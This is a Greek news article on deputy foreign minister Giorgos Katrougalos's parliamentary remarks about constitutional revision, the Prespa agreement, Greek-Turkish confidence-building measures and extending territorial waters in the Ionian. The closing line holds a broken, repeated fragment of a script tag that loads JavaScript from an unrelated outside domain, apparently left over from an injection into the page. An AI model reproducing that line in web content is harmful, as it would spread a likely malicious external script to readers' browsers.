Κατρούγκαλος: Ειλημμένη απόφαση η επέκταση των χωρικών υδάτων στο Ιόνιο μέχρι το καλοκαίρι

Ο Γιώργος Κατρούγκαλος στη Βουλή
Για τη συνταγματική αναθεώρηση και για όλες τις τελευταίες εξελίξεις μίλησε ο αναπληρωτής υπουργός Εξωτερικών. “Η επόμενη Βουλή δεν μπορεί να αποφασίσει εκλογή ΠτΔ με 151 βουλευτές” ανέφερε.

Και συνέχισε: “Η πρόταση που ψηφίστηκε είναι στην κατεύθυνση της εκλογής του ΠτΔ από το λαό εφόσον δεν είναι εφικτή η εκλογή του από τη Βουλή, αυτό ψήφισε η ΝΔ. Εχουμε απόφαση του Ανώτατου Ειδικού Δικαστηρίου και της ολομέλειας του ΣτΕ που υποστηρίζουν αυτά που λέμε εμείς, ότι η κατεύθυνση της παρούσας Βουλής είναι δεσμευτική για την επόμενη. Δεν πιστεύω ότι καμία κοινοβουλευτική πλειοψηφία δεν θα κάνει κάτι αντισυνταγματικό”. Σχετικά με την επανεκλογή του Πρ. Παυλόπουλου είπε ότι “δεν θέλω να πιστέψω ότι έχουν κάνει κρυφές συμφωνίες για το πρόσωπο του ΠτΔ. Αλλά με τη στάση τους μας οδηγούν σε αυτή τη σκέψη”. Για τη διαφοροποίηση Κασσιμάτη-Μιχελογιαννάκη είπε ότι “δεν μπορούμε να επικαλούμαστε την ελευθερία της συνείδησης και μετά να επικρίνουμε τους βουλευτές για τη διαφωνία τους. Οι προοδευτικές μεταρρυθμίσεις έχουν την υπογραφή του πρωθυπουργού”.

Για τις προσλήψεις στην ΕΥΠ με προσόν τη γνώση της “μακεδονικής (νοτιοσλαβικής) γλώσσας” ανέφερε ότι αυτόν τον όρο προβλέπει η συμφωνία των Πρεσπών και αυτός θα χρησιμοποιείται.

Σε σχέση με τα επόμενα βήματα στην υλοποίηση της συμφωνίας των Πρεσπών, τόνισε ότι “οι υποχρεώσεις είναι όλες στην άλλη πλευρά. Αλλάζουν έγγραφα, πινακίδες, διαβατήρια. Βρίσκονται μπροστά σε ένα τιτάνιο έργο, τεράστιο και γραφειοκρατικά”.

“Η ενεργοποίηση των ΜΟΕ που έχουν συμφωνηθεί και δεν εφαρμόζονται στο Αιγαίο -συνέχισε- συμφωνήθηκε στη συνάντηση των υπουργών Αμυνας Ελλάδας και Τουρκίας. Το επόμενο διάστημα θα συναντηθούν τα υπηρεσιακά κλιμάκια των δύο χωρών για να συζητήσουν ακριβώς αυτό. Οι διερευνητικές επαφές για το Αιγαίο είναι το αποκορύφωμα αυτής της προσπάθειας. Το Ανώτατο Συμβούλιο Στρατηγικής Συνεργασίας στη Θεσσαλονίκη είναι το επόμενο βήμα. Η επέκταση των χωρικών υδάτων στο Ιόνιο είναι ειλημμένη απόφαση και θα γίνει μέχρι το καλοκαίρι. Χρειάζεται ειδικός νόμος, όχι απλώς προεδρικό διάταγμα”.

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>